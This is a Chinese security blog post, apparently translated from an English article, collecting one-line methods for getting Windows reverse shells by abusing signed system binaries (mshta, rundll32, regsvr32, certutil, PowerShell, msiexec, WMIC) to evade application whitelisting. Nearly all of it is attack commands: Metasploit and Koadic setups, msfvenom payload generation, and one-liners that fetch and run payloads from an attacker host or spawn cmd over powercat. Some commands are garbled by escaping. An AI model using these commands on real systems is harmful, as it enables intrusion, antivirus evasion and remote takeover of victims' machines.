windows下基于白名单获取shell的方法整理(上)

  • A+
所属分类:安全博客
摘要

shellpayload 日常整理,当作笔记方便查阅。这一整篇文章的来源主要是看到了一位老外发的Get Reverse-shell via Windows one-liner文章而来,所幸就将他的作为上篇,待我整理后在把下篇发出来。

shellpayload

前言

日常整理,当作笔记方便查阅。这一整篇文章的来源主要是看到了一位老外发的Get Reverse-shell via Windows one-liner文章而来,所幸就将他的作为上篇,待我整理后在把下篇发出来。

这种方法也被很多黑产和APT组织用来白加黑免杀,简直就是屡试不爽。最后本人也是菜鸡一只,就当作学习而写,如有不对的地方,望指出。

概述

=====

一般来说,我们经常利用HTTP服务或者其他服务RCE漏洞获得反向shell。而这篇文章主要讨论windows 单行命令执行Powershell或者rundll32恶意指令获得windows系统反向shell。我们准备了windows命令行列表,能使你获得目标计算机的反向shell。

内容列表

Mshta.exe

  • 通过Metasploit的HTA Web服务器发起HTA攻击

Rundll32.exe

  • 通过Metasploit的SMB交付发起Rundll32攻击

Regsvr32.exe

  • 通过Metasploit的脚本Web交付启动Regsvr32

Certutil.exe

  • 通过Msfvenom C#shellcode启动MSbuild攻击

Powershell.exe

  • 通过Powershell启动Powercat攻击

  • 通过Powershell启动cscript.exe

  • 通过Powershell启动批处理文件攻击

Msiexec.exe

  • 通过msfvenom发起msiexec攻击

Wmic.exe

  • 通过Koadic发起Wmic.exe攻击

Mshta.exe

Mshta.exe运行微软HTML应用程序主机,微软HTML应用程序主机是Windows应用用程序,负责运行HTA(HTML应用程序)文件。我们通运行HTML文件执行JavaScript和VBScript脚本。Mshta.exe可以解释这种文件。

Metasploit 包含生成恶意HTA文件的“HTA WebServer”模块,恶意文件通过Powershell运行有效负载。当用户导航到HTA文件时,将在执行有效负载之前由IE两次提示它们。

use exploit/windows/misc/hta/_server msf exploit(windows/misc/hta/_server) >set srvhost 192.168.1.109 msf exploit(windows/misc/hta/_server) >set lhost 192.168.1.109 msf exploit(windows/misc/hta/_server) >exploit 

现在可以在受害者机器上执行mshta.exe恶意代码获得meterpreter会话

windows下基于白名单获取shell的方法整理(上)

在受害者机器上通过mshta.exe访问恶意hta远程文件,你就可以在本机获得shell。

mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta 

windows下基于白名单获取shell的方法整理(上)

获得受害主机shell:

windows下基于白名单获取shell的方法整理(上)

Rundll.exe

Rundll32.exe与Windows操作系统相关联,Rundll32.exe可调用从DLL导出的函数(16位或32位)并将其存储在特定的内存库中。

通过SMB交付Metasploit发起Rundll32攻击

Metasploit包含“ SMB Delivery”模块,该模块生成恶意的dll文件。 该模块通过SMB服务器提供有效负载,并提供控制命令。 当前支持DLL和Powershell。

use exploit/windows/smb/smb/_delivery msf exploit(windows/smb/smb/_delivery) > set srvhost 192.168.1.109 msf exploit(windows/smb/smb_delivery) > exploit 

下面通过Rundll32.exe命令获得meterpreter会话。

windows下基于白名单获取shell的方法整理(上)

在受控机器上远程执行恶意dll,你将获得受控计算机的反向shell。

rundll32.exe ///192.168.1.109//vabFG//test.dll,0 

windows下基于白名单获取shell的方法整理(上)

获得meterpreter会话如下:

windows下基于白名单获取shell的方法整理(上)

Regsvr32.exe

Regsvr32.exe是一个命令行程序,用于注册和注销OLE控件,例如Windows注册表中的DLL和ActiveX控件。Regsvr32.exe安装在Windows XP和Windows更高版本的%systemroot%/ System32文件夹下。

RegSvr32.exe具有以下命令行选项: 语法:Regsvr32 /[/ s/] /[/ u/] /[/ n/] /[/ i /[:cmdline/]/]<dllname>              / u –注销服务器              / i –调用DllInstall,并为其传递可选的/[cmdline/];     与/ u一起使用时,它将调用dll进行卸载             / n –不调用DllRegisterServer;此选项必须与 / i一起使用 / s –静音;不显示消息框 

通过Metasploit的脚本Web交付启动Regsvr32

此模块可快速启动提供有效负载的Web服务器。提供的命令将允许有效负载下载并执行。它将通过regsvr32.exe来指定脚本语言解释器或“ squibledoo”来绕过应用程序白名单。该模块的主要目的是在目标计算机上快速建立会话。

Regsvr32使用squiblydoo技术绕过应用程序白名单。签名的Microsoft二进制文件Regsvr32能够运行.sct文件,然后在其中执行包含PowerShell命令。两个Web请求(即.sct文件和PowerShell下载/执行)都可以在同一端口上执行。“PSH(Binary)”会将文件写入到硬盘中,允许自定义二进制文件被下载和执行。

use exploit/multi/script/web/_delivery msf exploit (web/_delivery)>set target 3 msf exploit (web/_delivery)> set payloadphp/meterpreter/reverse/_tcp msf exploit (web/_delivery)> set lhost192.168.1.109 msf exploit (web/_delivery)>set srvhost192.168.1.109 msf exploit (web_delivery)>exploit 

复制下图中突出被框选的代码:

windows下基于白名单获取shell的方法整理(上)

一旦该exploit被执行,您将拥有一个为您创建的URL。在受害者pc的命令提示符中运行该URL,如下所示:

windows下基于白名单获取shell的方法整理(上)

在命令执行后按Enter键,您将拥有您的会话。如下图所示,输入sysinfo命令获取主机信息:

windows下基于白名单获取shell的方法整理(上)

Certutil.exe

Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机上执行恶意EXE文件,并获取meterpreter会话。

通过Msfvenom 发起certutil攻击

通过msfvenom 生成恶意可执行文件,并使用start multi/handler 获取目标计算机反向shell会话。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe 

再用python生成一个简易的http服务器

windows下基于白名单获取shell的方法整理(上)

现在,为了使用certutil.exe能够获取配置信息和可执行文件,我们需要使用如下语法:

语法:[-f] [-urlcache] [-split]可执行文件路径

certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe 

windows下基于白名单获取shell的方法整理(上)

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit 

这样,我们获得了目标计算机的反向shell。如下所示:

windows下基于白名单获取shell的方法整理(上)

Powershell.exe

您可以使用PowerShell.exe从另一个工具(例如Cmd.exe)的命令行启动PowerShell会话,也可以在PowerShell命令行启动新会话。从此处阅读Microsoft Windows官方网站上的更多信息。

通过Powershell启动Powercat攻击

PowerCat是一个的powershell写的TCP / IP瑞士军刀,看一看成NCAT的的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,SMB协议支持,中继模式,生成有效载荷,端口扫描等等。

在本地计算机中下载 PowerShell,然后下载 Powercat.ps1,使用 python HTTP 服务器传输文件,以获取目标的反向外壳,如下所示,然后启动 netcat 侦听器。

git clone https://github.com/besimorhino/powercat.gitpython -m SimpleHTTPServer 80 

windows下基于白名单获取shell的方法整理(上)

然后在远程端执行下面的命令获得netcat会话。

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd" 

windows下基于白名单获取shell的方法整理(上)

正如你观察到的,我们已经获得了目标机器的netcat会话。

windows下基于白名单获取shell的方法整理(上)

批处理文件攻击

同样,PowerShell 允许客户端执行批处理文件,因此让我们使用 msfvenom 生成恶意批处理文件,如下所示,然后启动 netcat 侦听器。

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat 

windows下基于白名单获取shell的方法整理(上)

然后执行以下命令以获取 netcat 会话。

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat')) 

windows下基于白名单获取shell的方法整理(上)

如下,我们已经获得了目标机器的netcat会话。

windows下基于白名单获取shell的方法整理(上)

利用cscript.exe

同样,PowerShell 允许客户端执行cscript.exe 运行 wsf、js 和vbscript文件。因此,让我们生成具有 msfvenom 的恶意bat文件,如下所示,并作为侦听器启动multi/handler程序。

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs >1.vbs 

windows下基于白名单获取shell的方法整理(上)

在目标机器上执行下面的命令行获得meterpreter会话。

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',//"$env:temp//test.vbs//");Start-Process %windir%//system32//cscript.exe //"$env:temp//test.vbs//"" 

windows下基于白名单获取shell的方法整理(上)

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit 

获得meterpreter会话如下:

windows下基于白名单获取shell的方法整理(上)

Msiexec.exe

Windows 操作系统附带了一个 Windows 安装程序引擎,该引擎由 MSI 程序包用于应用程序的安装。解释包和安装产品的可执行程序就是 Msiexec.exe。

通过msfvenom发起msiexec攻击

让我们利用MeterpreterWindows攻击载荷生成 MSI 包文件(1.msi)如下所示,并作为侦听器启动multi/handler程序进行监听。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109lport=1234 -f msi > 1.msi 

windows下基于白名单获取shell的方法整理(上)

在msiexec 的帮助下,一旦您在远程计算机上执行 1.msi 文件,你会得到反向连接在您的本地计算机(Kali Linux).

msiexec /q /i http://192.168.1.109/1.msi 

windows下基于白名单获取shell的方法整理(上)

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit 

获得meterpreter会话如下:

windows下基于白名单获取shell的方法整理(上)

Wmic.exe

WMIC .exe是一个 Microsoft 工具,它提供了一个 WMI命令行界面,用于本地和远程计算机的各种管理功能,还用于在本地或远程执行系统设置、停止进程和执行脚本等查询。因此,它可以调用 XSL 脚本(可增强样式表语言)。

通过Koadic发起Wmic.exe攻击

koadic是一个命令控制(C2)工具,类似Metasploit和Powershell Empire。使用koadic我们生成恶意XSL文件。koadic安装完成后,您可以运行./koadic 文件以启动 koadic,然后通过运行以下命令开始加载stager/js/wmic 程序,并将 SRVHOST 设置为程序回连IP。

use stager/js/wmic set SRVHOST 192.168.1.107 run 

windows下基于白名单获取shell的方法整理(上)

执行 WMIC 以下命令,从远程服务器下载和运行恶意 XSL 文件:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl" 

windows下基于白名单获取shell的方法整理(上)

一旦恶意的XSL文件在目标计算机上执行,你将有一个僵尸连接,就像Metasploit回连的情况一样。

windows下基于白名单获取shell的方法整理(上)

来源:http://www.safe6.cn/

本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

windows下基于白名单获取shell的方法整理(上)

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2020-02-17

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: